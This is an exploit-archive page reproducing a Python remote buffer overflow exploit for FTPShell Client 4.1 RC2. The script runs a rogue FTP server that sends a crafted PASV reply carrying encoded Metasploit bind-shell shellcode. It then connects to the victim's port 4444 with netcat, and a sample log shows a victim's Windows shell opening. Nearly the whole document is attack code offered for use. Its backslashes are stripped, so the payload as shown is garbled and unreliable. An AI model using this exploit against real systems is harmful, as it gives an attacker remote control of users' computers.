FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
# Published : 2009-09-09
# Author : His0k4
# Previous Title : SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)
# Next Title : Pidgin MSN <= 2.5.8 Remote Code Execution Exploit
#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[+] Bug :	 FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
#[+] Author :	 His0k4
#[+] Tested on : xp_sp3,w2k_sp4
#[+] Greetz :	 All friends
#		 piece of "zlabiya"

#---exploit-log---
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response...
#[+] Done, wait for trying to connect to port 4444 on the target...
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and SettingsvictimDesktop>


from socket import *
import os
import time


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
stage2 =(
"x44x7Ax32x37x44x7Ax32x37"
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e"
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38"
"x4ex46x46x42x46x32x4bx48x45x34x4ex43x4bx58x4ex57"
"x45x30x4ax47x41x50x4fx4ex4bx58x4fx34x4ax31x4bx38"
"x4fx55x42x42x41x30x4bx4ex49x54x4bx38x46x53x4bx38"
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x35x46x32x4ax32x45x57x45x4ex4bx48"
"x4fx45x46x32x41x50x4bx4ex48x46x4bx58x4ex50x4bx44"
"x4bx58x4fx45x4ex41x41x50x4bx4ex43x30x4ex42x4bx38"
"x49x58x4ex56x46x52x4ex31x41x36x43x4cx41x53x4bx4d"
"x46x36x4bx38x43x34x42x53x4bx58x42x34x4ex30x4bx48"
"x42x37x4ex31x4dx4ax4bx38x42x44x4ax30x50x35x4ax36"
"x50x48x50x44x50x50x4ex4ex42x45x4fx4fx48x4dx48x46"
"x43x55x48x46x4ax46x43x43x44x33x4ax56x47x57x43x57"
"x44x43x4fx55x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx53x42x35x4fx4fx48x4dx4fx45x49x48x45x4e"
"x48x46x41x58x4dx4ex4ax50x44x50x45x55x4cx56x44x30"
"x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x45"
"x4fx4fx48x4dx43x35x43x35x43x35x43x35x43x55x43x54"
"x43x55x43x54x43x35x4fx4fx42x4dx48x46x4ax36x41x51"
"x4ex55x48x46x43x55x49x38x41x4ex45x39x4ax36x46x4a"
"x4cx51x42x47x47x4cx47x35x4fx4fx48x4dx4cx36x42x51"
"x41x35x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x52"
"x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d"
"x4ax36x45x4ex49x44x48x38x49x44x47x55x4fx4fx48x4d"
"x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x47x48x4cx49x37x47x35x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x46x4cx36x46x36x48x46x4ax56x43x36"
"x4dx36x49x58x45x4ex4cx46x42x35x49x55x49x52x4ex4c"
"x49x58x47x4ex4cx46x46x44x49x58x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x34x4ex32"
"x43x39x4dx48x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax56"
"x44x47x50x4fx43x4bx48x31x4fx4fx45x57x46x54x4fx4f"
"x48x4dx4bx55x47x55x44x35x41x45x41x35x41x55x4cx46"
"x41x30x41x55x41x35x45x55x41x45x4fx4fx42x4dx4ax36"
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x45x4ex4f"
"x43x48x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d"
"x4ax56x42x4fx4cx38x46x50x4fx55x43x55x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

stage1=(
#[*] Using Msf::Encoder::PexAlphaNum with final size of 141 bytes
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx48x36x41x38x4cx4c"
"x4fx4fx4fx50x44x34x44x55x4cx46x44x50x4ax35x4dx4c"
"x50x52x4ex33x45x30x4cx35x46x37x4fx4ex4ax4bx46x54"
"x4cx47x44x43x47x33x4bx58x4cx4fx4fx4ax45x37x4cx4e"
"x4fx4ax45x57x47x4ex4fx4fx47x4ex4cx50x5a")


buffer =  stage1 #<---------------------------------|
buffer += 'x41'*(412-len(stage1)) #		    |
buffer += 'xC5xB3x43x00'	# add esp,8;retn----|


s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 21))
s.listen(1)
print "[+] Listening on [FTP] 21"
c, addr = s.accept()

print "[+] Connection accepted from: %s" % (addr[0])

c.send("220 Hey victim batet fik!rn")
c.recv(1024)
time.sleep(0.5)
c.send("331 User anonymous OK Password requiredrn")
c.recv(1024)
time.sleep(0.5)
c.send("230 Ok.rn")
c.recv(1024)

# Enable this when client performs CWD command
#time.sleep(1)
#c.send("250 CWD command successful.rn")
#c.recv(1024)

time.sleep(0.5)
c.send("257 x22/x22 is current directoryrn")
c.recv(1024)
time.sleep(0.5)
c.send("200 Type set to A.rn")
c.recv(1024)
time.sleep(0.5)
print "[+] Sending the malicious pasv response..."
c.send("227 "+stage2+"rn"
"227 Entering Passive Mode ("+buffer+").rn"
"rn")
time.sleep(2)
c.close()
s.close()
print("[+] Done, wait for trying to connect to the target on port 4444...n")
time.sleep(25)
os.system("nc -nv "+addr[0]+" 4444")

# www.Syue.com [2009-09-09]